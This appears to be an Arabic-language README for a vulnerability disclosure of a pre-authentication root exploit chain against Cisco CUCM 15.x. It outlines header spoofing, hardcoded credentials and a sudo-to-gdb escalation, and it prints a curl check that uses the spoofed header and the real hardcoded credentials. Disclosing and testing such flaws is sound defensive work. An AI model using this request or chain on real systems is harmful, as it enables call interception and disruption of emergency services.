
Silent;Call — جذر عن بُعد قبل المصادقة على Cisco CUCM 15.x (CVSS 10.0)

وصول جذري عن بُعد قبل المصادقة على Cisco Unified Communications Manager 15.x
ثلاثة طلبات HTTP. صفر بيانات اعتماد. وصول جذري. كل مكالمة أصبحت لك الآن.
| الخطوة | المكوّن | الوصف |
|---|---|---|
| 1 | Spoofhack | انتحال ترويسة X-Forwarded-For يتجاوز قيد localhost على Tomcat Manager |
| 2 | Keyhack | بيانات اعتماد مكتوبة في الكود (متطابقة في كل تثبيت لـ CUCM) تمنح صلاحية نشر حزمة WAR |
| 3 | Roothack | sudo بدون كلمة مرور إلى gdb مع ملف أوامر يتحكم فيه المهاجم → root |
يمنح الوصول الجذري إلى CUCM المهاجم القدرة على اعتراض جميع الاتصالات الصوتية، والوصول إلى مفاتيح تشفير SRTP، وتفعيل التنصت القانوني المدمج (CALEA)، والوصول إلى كل البريد الصوتي، والتلاعب بتوجيه المكالمات، وتعطيل خدمات الطوارئ E911، واستخراج سجلات تفاصيل المكالمات الكاملة.
| الملف | الوصف |
|---|---|
| ADVISORY.md | استشارة تقنية كاملة مع تحليل السبب الجذري |
| poc.sh | سكربت إثبات المفهوم (bash/curl) |
# Test if a CUCM instance is vulnerable (read-only, no exploitation)
curl -sk -H "X-Forwarded-For: 127.0.0.1" \
-u '1mJdd4WKi+:1ge1AVWsx~' \
"https://TARGET:443/manager/text/list"
إذا رأيت OK - Listed applications for virtual host [localhost] — فالنظام معرّض للثغرة.
الجدول الزمني الكامل للتنسيق: cisco-security-research
0xReadingSteiner — [email protected]
أُجري هذا البحث بشكل مستقل على برمجيات متاحة تجاريًا في مختبر خاص. لم يُستخدم أي كود مصدري مملوك، أو أدوات داخلية، أو معلومات سرية.
نص الاستشارة: CC BY 4.0. سكربت PoC: لأغراض دفاعية وتعليمية فقط.